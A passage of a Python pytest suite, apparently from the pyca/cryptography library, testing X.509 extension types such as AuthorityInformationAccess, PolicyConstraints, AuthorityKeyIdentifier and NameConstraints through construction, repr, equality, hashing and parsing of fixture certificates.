        ad = x509.AccessDescription(
            ObjectIdentifier("2.999.1"),
            x509.UniformResourceIdentifier("http://example.com"),
        )
        assert ad is not None

    def test_repr(self):
        ad = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        assert repr(ad) == (
            "<AccessDescription(access_method=<ObjectIdentifier(oid=1.3.6"
            ".1.5.5.7.48.1, name=OCSP)>, access_location=<UniformResource"
            "Identifier(value='http://ocsp.domain.com')>)>"
        )

    def test_eq(self):
        # Equal when both method and location match.
        ad = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        ad2 = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        assert ad == ad2

    def test_ne(self):
        # Unequal when either component differs, or against foreign types.
        ad = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        ad2 = x509.AccessDescription(
            AuthorityInformationAccessOID.CA_ISSUERS,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        ad3 = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://notthesame"),
        )
        assert ad != ad2
        assert ad != ad3
        assert ad != object()

    def test_hash(self):
        # Hash is derived from (access_method, access_location).
        ad = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        ad2 = x509.AccessDescription(
            AuthorityInformationAccessOID.OCSP,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        ad3 = x509.AccessDescription(
            AuthorityInformationAccessOID.CA_ISSUERS,
            x509.UniformResourceIdentifier("http://ocsp.domain.com"),
        )
        assert hash(ad) == hash(ad2)
        assert hash(ad) != hash(ad3)
class TestPolicyConstraints(object):
    """Tests for the x509.PolicyConstraints extension value."""

    def test_invalid_explicit_policy(self):
        """require_explicit_policy must be an int or None."""
        with pytest.raises(TypeError):
            x509.PolicyConstraints("invalid", None)  # type:ignore[arg-type]

    def test_invalid_inhibit_policy(self):
        """inhibit_policy_mapping must be an int or None."""
        with pytest.raises(TypeError):
            x509.PolicyConstraints(None, "invalid")  # type:ignore[arg-type]

    def test_both_none(self):
        """At least one of the two fields must be set."""
        with pytest.raises(ValueError):
            x509.PolicyConstraints(None, None)

    def test_repr(self):
        """repr() names both fields explicitly."""
        expected = (
            "<PolicyConstraints(require_explicit_policy=0, inhibit_policy_ma"
            "pping=None)>"
        )
        assert repr(x509.PolicyConstraints(0, None)) == expected

    def test_eq(self):
        """Matching field pairs compare equal."""
        assert x509.PolicyConstraints(2, 1) == x509.PolicyConstraints(2, 1)

    def test_ne(self):
        """Any differing field — or a foreign type — breaks equality."""
        base = x509.PolicyConstraints(2, 1)
        assert base != x509.PolicyConstraints(2, 2)
        assert base != x509.PolicyConstraints(3, 1)
        assert base != object()

    def test_hash(self):
        """Hash is derived from both fields."""
        a = x509.PolicyConstraints(2, 1)
        b = x509.PolicyConstraints(2, 1)
        c = x509.PolicyConstraints(2, None)
        assert hash(a) == hash(b)
        assert hash(a) != hash(c)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestPolicyConstraintsExtension(object):
    """Parses the PolicyConstraints extension from fixture certificates,
    covering each field set on its own."""

    def test_inhibit_policy_mapping(self, backend):
        cert = _load_cert(
            os.path.join("x509", "department-of-state-root.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.POLICY_CONSTRAINTS,
        )
        # RFC 5280 requires this extension to be critical.
        assert ext.critical is True
        assert ext.value == x509.PolicyConstraints(
            require_explicit_policy=None,
            inhibit_policy_mapping=0,
        )

    def test_require_explicit_policy(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "policy_constraints_explicit.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.POLICY_CONSTRAINTS
        )
        assert ext.critical is True
        assert ext.value == x509.PolicyConstraints(
            require_explicit_policy=1,
            inhibit_policy_mapping=None,
        )
class TestAuthorityInformationAccess(object):
    """Tests for the AuthorityInformationAccess extension value: an ordered,
    hashable sequence of AccessDescription objects."""

    def test_invalid_descriptions(self):
        # Every element must be an AccessDescription.
        with pytest.raises(TypeError):
            x509.AuthorityInformationAccess(
                ["notanAccessDescription"]  # type:ignore[list-item]
            )

    def test_iter_len(self):
        # len() and iteration preserve construction order.
        aia = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        assert len(aia) == 2
        assert list(aia) == [
            x509.AccessDescription(
                AuthorityInformationAccessOID.OCSP,
                x509.UniformResourceIdentifier("http://ocsp.domain.com"),
            ),
            x509.AccessDescription(
                AuthorityInformationAccessOID.CA_ISSUERS,
                x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
            ),
        ]

    def test_iter_input(self):
        # The constructor accepts any iterable, not just lists.
        desc = [
            x509.AccessDescription(
                AuthorityInformationAccessOID.OCSP,
                x509.UniformResourceIdentifier("http://ocsp.domain.com"),
            )
        ]
        aia = x509.AuthorityInformationAccess(iter(desc))
        assert list(aia) == desc

    def test_repr(self):
        aia = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        assert repr(aia) == (
            "<AuthorityInformationAccess([<AccessDescription(access_method"
            "=<ObjectIdentifier(oid=1.3.6.1.5.5.7.48.1, name=OCSP)>, acces"
            "s_location=<UniformResourceIdentifier(value='http://oc"
            "sp.domain.com')>)>, <AccessDescription(access_method=<ObjectI"
            "dentifier(oid=1.3.6.1.5.5.7.48.2, name=caIssuers)>, access_lo"
            "cation=<UniformResourceIdentifier(value='http://domain"
            ".com/ca.crt')>)>])>"
        )

    def test_eq(self):
        # Equal when the description sequences match element-wise.
        aia = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        aia2 = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        assert aia == aia2

    def test_ne(self):
        # A shorter sequence — or a foreign type — compares unequal.
        aia = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        aia2 = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
            ]
        )
        assert aia != aia2
        assert aia != object()

    def test_indexing(self):
        # Supports negative indices and slicing with a step.
        aia = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp2.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp3.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp4.domain.com"),
                ),
            ]
        )
        assert aia[-1] == aia[4]
        assert aia[2:6:2] == [aia[2], aia[4]]

    def test_hash(self):
        # Hash is derived from the contained descriptions.
        aia = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        aia2 = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        aia3 = x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.other.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier("http://domain.com/ca.crt"),
                ),
            ]
        )
        assert hash(aia) == hash(aia2)
        assert hash(aia) != hash(aia3)
class TestSubjectInformationAccess(object):
    """Tests for the SubjectInformationAccess extension value: an ordered,
    hashable sequence of AccessDescription objects."""

    def test_invalid_descriptions(self):
        # Every element must be an AccessDescription.
        with pytest.raises(TypeError):
            x509.SubjectInformationAccess(
                ["notanAccessDescription"]  # type:ignore[list-item]
            )

    def test_iter_len(self):
        # len() and iteration preserve construction order.
        sia = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
            ]
        )
        assert len(sia) == 2
        assert list(sia) == [
            x509.AccessDescription(
                SubjectInformationAccessOID.CA_REPOSITORY,
                x509.UniformResourceIdentifier("http://ca.domain.com"),
            ),
            x509.AccessDescription(
                SubjectInformationAccessOID.CA_REPOSITORY,
                x509.UniformResourceIdentifier("http://ca2.domain.com"),
            ),
        ]

    def test_iter_input(self):
        # The constructor accepts any iterable, not just lists.
        desc = [
            x509.AccessDescription(
                SubjectInformationAccessOID.CA_REPOSITORY,
                x509.UniformResourceIdentifier("http://ca.domain.com"),
            )
        ]
        sia = x509.SubjectInformationAccess(iter(desc))
        assert list(sia) == desc

    def test_repr(self):
        sia = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                )
            ]
        )
        assert repr(sia) == (
            "<SubjectInformationAccess([<AccessDescription(access_method"
            "=<ObjectIdentifier(oid=1.3.6.1.5.5.7.48.5, name=caRepositor"
            "y)>, access_location=<UniformResourceIdentifier(value='http"
            "://ca.domain.com')>)>])>"
        )

    def test_eq(self):
        # Equal when the description sequences match element-wise.
        sia = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
            ]
        )
        sia2 = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
            ]
        )
        assert sia == sia2

    def test_ne(self):
        # A shorter sequence — or a foreign type — compares unequal.
        sia = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
            ]
        )
        sia2 = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
            ]
        )
        assert sia != sia2
        assert sia != object()

    def test_indexing(self):
        # Supports negative indices and slicing with a step.
        sia = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca3.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca4.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca5.domain.com"),
                ),
            ]
        )
        assert sia[-1] == sia[4]
        assert sia[2:6:2] == [sia[2], sia[4]]

    def test_hash(self):
        # Hash is derived from the contained descriptions.
        sia = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
            ]
        )
        sia2 = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca2.domain.com"),
                ),
            ]
        )
        sia3 = x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca.domain.com"),
                ),
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("http://ca3.domain.com"),
                ),
            ]
        )
        assert hash(sia) == hash(sia2)
        assert hash(sia) != hash(sia3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestSubjectInformationAccessExtension(object):
    """Parses the SubjectInformationAccess extension from a fixture
    certificate, including a non-standard access-method OID."""

    def test_sia(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "sia.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_INFORMATION_ACCESS
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value == x509.SubjectInformationAccess(
            [
                x509.AccessDescription(
                    SubjectInformationAccessOID.CA_REPOSITORY,
                    x509.UniformResourceIdentifier("https://my.ca.issuer/"),
                ),
                x509.AccessDescription(
                    x509.ObjectIdentifier("2.999.7"),
                    x509.UniformResourceIdentifier(
                        "gopher://info-mac-archive"
                    ),
                ),
            ]
        )
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestAuthorityInformationAccessExtension(object):
    """Parses the AuthorityInformationAccess extension from fixture
    certificates: OCSP + caIssuers together, repeated methods, and each
    method on its own (including a directoryName location)."""

    def test_aia_ocsp_ca_issuers(self, backend):
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_INFORMATION_ACCESS
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value == x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://gv.symcd.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.UniformResourceIdentifier(
                        "http://gv.symcb.com/gv.crt"
                    ),
                ),
            ]
        )

    def test_aia_multiple_ocsp_ca_issuers(self, backend):
        # Duplicate access methods are preserved in order; caIssuers may
        # point at a directoryName rather than a URI.
        cert = _load_cert(
            os.path.join("x509", "custom", "aia_ocsp_ca_issuers.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_INFORMATION_ACCESS
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value == x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp2.domain.com"),
                ),
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.DirectoryName(
                        x509.Name(
                            [
                                x509.NameAttribute(
                                    NameOID.COMMON_NAME, "myCN"
                                ),
                                x509.NameAttribute(
                                    NameOID.ORGANIZATION_NAME, "some Org"
                                ),
                            ]
                        )
                    ),
                ),
            ]
        )

    def test_aia_ocsp_only(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "aia_ocsp.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_INFORMATION_ACCESS
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value == x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.OCSP,
                    x509.UniformResourceIdentifier("http://ocsp.domain.com"),
                ),
            ]
        )

    def test_aia_ca_issuers_only(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "aia_ca_issuers.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_INFORMATION_ACCESS
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value == x509.AuthorityInformationAccess(
            [
                x509.AccessDescription(
                    AuthorityInformationAccessOID.CA_ISSUERS,
                    x509.DirectoryName(
                        x509.Name(
                            [
                                x509.NameAttribute(
                                    NameOID.COMMON_NAME, "myCN"
                                ),
                                x509.NameAttribute(
                                    NameOID.ORGANIZATION_NAME, "some Org"
                                ),
                            ]
                        )
                    ),
                ),
            ]
        )
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestAuthorityKeyIdentifierExtension(object):
    """Parsing and construction tests for the Authority Key Identifier
    extension: field-by-field parsing from fixtures, plus building an AKI
    from an issuer's public key or SubjectKeyIdentifier and checking it
    matches the one embedded in the issued certificate.
    """
    def test_aki_keyid(self, backend):
        """AKI with only the keyIdentifier field populated; issuer and
        serial number are absent."""
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_KEY_IDENTIFIER
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value.key_identifier == (
            b"\xc3\x9c\xf3\xfc\xd3F\x084\xbb\xceF\x7f\xa0|[\xf3\xe2\x08\xcbY"
        )
        assert ext.value.authority_cert_issuer is None
        assert ext.value.authority_cert_serial_number is None
    def test_aki_all_fields(self, backend):
        """AKI with keyIdentifier, authorityCertIssuer and
        authorityCertSerialNumber all present."""
        cert = _load_cert(
            os.path.join("x509", "custom", "authority_key_identifier.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_KEY_IDENTIFIER
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value.key_identifier == (
            b"9E>\xca=b\x1d\xea\x86I\xf6Z\xab@\xb7\xa4p\x98\xf1\xec"
        )
        assert ext.value.authority_cert_issuer == [
            x509.DirectoryName(
                x509.Name(
                    [
                        x509.NameAttribute(NameOID.ORGANIZATION_NAME, "PyCA"),
                        x509.NameAttribute(
                            NameOID.COMMON_NAME, "cryptography.io"
                        ),
                    ]
                )
            )
        ]
        assert ext.value.authority_cert_serial_number == 3
    def test_aki_no_keyid(self, backend):
        """AKI where keyIdentifier is absent but issuer/serial are set."""
        cert = _load_cert(
            os.path.join(
                "x509", "custom", "authority_key_identifier_no_keyid.pem"
            ),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_KEY_IDENTIFIER
        )
        assert ext is not None
        assert ext.critical is False
        assert ext.value.key_identifier is None
        assert ext.value.authority_cert_issuer == [
            x509.DirectoryName(
                x509.Name(
                    [
                        x509.NameAttribute(NameOID.ORGANIZATION_NAME, "PyCA"),
                        x509.NameAttribute(
                            NameOID.COMMON_NAME, "cryptography.io"
                        ),
                    ]
                )
            )
        ]
        assert ext.value.authority_cert_serial_number == 3
    def test_from_certificate(self, backend):
        """AKI built from the issuer's public key equals the AKI embedded in
        the certificate it signed."""
        issuer_cert = _load_cert(
            os.path.join("x509", "rapidssl_sha256_ca_g3.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_KEY_IDENTIFIER
        )
        aki = x509.AuthorityKeyIdentifier.from_issuer_public_key(
            issuer_cert.public_key()
        )
        assert ext.value == aki
    def test_from_issuer_subject_key_identifier(self, backend):
        """AKI built from the issuer's SubjectKeyIdentifier extension equals
        the AKI embedded in the certificate it signed."""
        issuer_cert = _load_cert(
            os.path.join("x509", "rapidssl_sha256_ca_g3.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.AUTHORITY_KEY_IDENTIFIER
        )
        ski_ext = issuer_cert.extensions.get_extension_for_class(
            x509.SubjectKeyIdentifier
        )
        aki = x509.AuthorityKeyIdentifier.from_issuer_subject_key_identifier(
            ski_ext.value
        )
        assert ext.value == aki
class TestNameConstraints(object):
    """Unit tests for the ``x509.NameConstraints`` value type: constructor
    validation, accessors, iterator inputs, ``repr``, equality and hashing.
    """
    def test_ipaddress_wrong_type(self):
        """IPAddress subtrees must wrap networks, not host addresses."""
        with pytest.raises(TypeError):
            x509.NameConstraints(
                permitted_subtrees=[
                    x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
                ],
                excluded_subtrees=None,
            )
        with pytest.raises(TypeError):
            x509.NameConstraints(
                permitted_subtrees=None,
                excluded_subtrees=[
                    x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
                ],
            )
    def test_ipaddress_allowed_type(self):
        """IPv4Network-wrapped IPAddress entries are accepted on both sides."""
        permitted = [x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/29"))]
        excluded = [x509.IPAddress(ipaddress.IPv4Network("10.10.0.0/24"))]
        nc = x509.NameConstraints(
            permitted_subtrees=permitted, excluded_subtrees=excluded
        )
        assert nc.permitted_subtrees == permitted
        assert nc.excluded_subtrees == excluded
    def test_invalid_permitted_subtrees(self):
        with pytest.raises(TypeError):
            x509.NameConstraints("badpermitted", None)  # type:ignore[arg-type]
    def test_invalid_excluded_subtrees(self):
        with pytest.raises(TypeError):
            x509.NameConstraints(None, "badexcluded")  # type:ignore[arg-type]
    def test_no_subtrees(self):
        """At least one of permitted/excluded must be provided."""
        with pytest.raises(ValueError):
            x509.NameConstraints(None, None)
    def test_permitted_none(self):
        excluded = [x509.DNSName("name.local")]
        nc = x509.NameConstraints(
            permitted_subtrees=None, excluded_subtrees=excluded
        )
        assert nc.permitted_subtrees is None
        assert nc.excluded_subtrees is not None
    def test_excluded_none(self):
        permitted = [x509.DNSName("name.local")]
        nc = x509.NameConstraints(
            permitted_subtrees=permitted, excluded_subtrees=None
        )
        assert nc.permitted_subtrees is not None
        assert nc.excluded_subtrees is None
    def test_iter_input(self):
        """Generators/iterators are accepted and materialized to lists."""
        subtrees = [x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/24"))]
        nc = x509.NameConstraints(iter(subtrees), iter(subtrees))
        assert nc.permitted_subtrees is not None
        assert list(nc.permitted_subtrees) == subtrees
        assert nc.excluded_subtrees is not None
        assert list(nc.excluded_subtrees) == subtrees
    def test_repr(self):
        permitted = [x509.DNSName("name.local"), x509.DNSName("name2.local")]
        nc = x509.NameConstraints(
            permitted_subtrees=permitted, excluded_subtrees=None
        )
        assert repr(nc) == (
            "<NameConstraints(permitted_subtrees=[<DNSName("
            "value='name.local')>, <DNSName(value="
            "'name2.local')>], excluded_subtrees=None)>"
        )
    def test_eq(self):
        nc = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=[x509.DNSName("name2.local")],
        )
        nc2 = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=[x509.DNSName("name2.local")],
        )
        assert nc == nc2
    def test_ne(self):
        """Differing on either subtree list (or type) breaks equality."""
        nc = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=[x509.DNSName("name2.local")],
        )
        nc2 = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=None,
        )
        nc3 = x509.NameConstraints(
            permitted_subtrees=None,
            excluded_subtrees=[x509.DNSName("name2.local")],
        )
        assert nc != nc2
        assert nc != nc3
        assert nc != object()
    def test_hash(self):
        """Hash agrees with equality: equal objects hash alike, unequal
        combinations hash differently."""
        nc = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=[x509.DNSName("name2.local")],
        )
        nc2 = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=[x509.DNSName("name2.local")],
        )
        nc3 = x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("name.local")],
            excluded_subtrees=None,
        )
        nc4 = x509.NameConstraints(
            permitted_subtrees=None,
            excluded_subtrees=[x509.DNSName("name.local")],
        )
        assert hash(nc) == hash(nc2)
        assert hash(nc) != hash(nc3)
        assert hash(nc3) != hash(nc4)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestNameConstraintsExtension(object):
    """Parsing tests for the Name Constraints extension from certificate
    fixtures, plus a round-trip through CertificateBuilder."""
    def test_permitted_excluded(self, backend):
        """Both permitted (DNSName) and excluded (DirectoryName) subtrees."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_permitted_excluded_2.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        nc = cert.extensions.get_extension_for_oid(
            ExtensionOID.NAME_CONSTRAINTS
        ).value
        assert nc == x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("zombo.local")],
            excluded_subtrees=[
                x509.DirectoryName(
                    x509.Name(
                        [x509.NameAttribute(NameOID.COMMON_NAME, "zombo")]
                    )
                )
            ],
        )
    def test_permitted(self, backend):
        """Permitted subtrees only; excluded parses as None."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_permitted_2.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        nc = cert.extensions.get_extension_for_oid(
            ExtensionOID.NAME_CONSTRAINTS
        ).value
        assert nc == x509.NameConstraints(
            permitted_subtrees=[x509.DNSName("zombo.local")],
            excluded_subtrees=None,
        )
    def test_permitted_with_leading_period(self, backend):
        """DNS subtrees may carry a leading period; it is preserved."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_permitted.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        nc = cert.extensions.get_extension_for_oid(
            ExtensionOID.NAME_CONSTRAINTS
        ).value
        assert nc == x509.NameConstraints(
            permitted_subtrees=[
                x509.DNSName(".cryptography.io"),
                x509.UniformResourceIdentifier("ftp://cryptography.test"),
            ],
            excluded_subtrees=None,
        )
    def test_excluded_with_leading_period(self, backend):
        """Leading-period DNS names are preserved on the excluded side too."""
        cert = _load_cert(
            os.path.join("x509", "custom", "nc_excluded.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        nc = cert.extensions.get_extension_for_oid(
            ExtensionOID.NAME_CONSTRAINTS
        ).value
        assert nc == x509.NameConstraints(
            permitted_subtrees=None,
            excluded_subtrees=[
                x509.DNSName(".cryptography.io"),
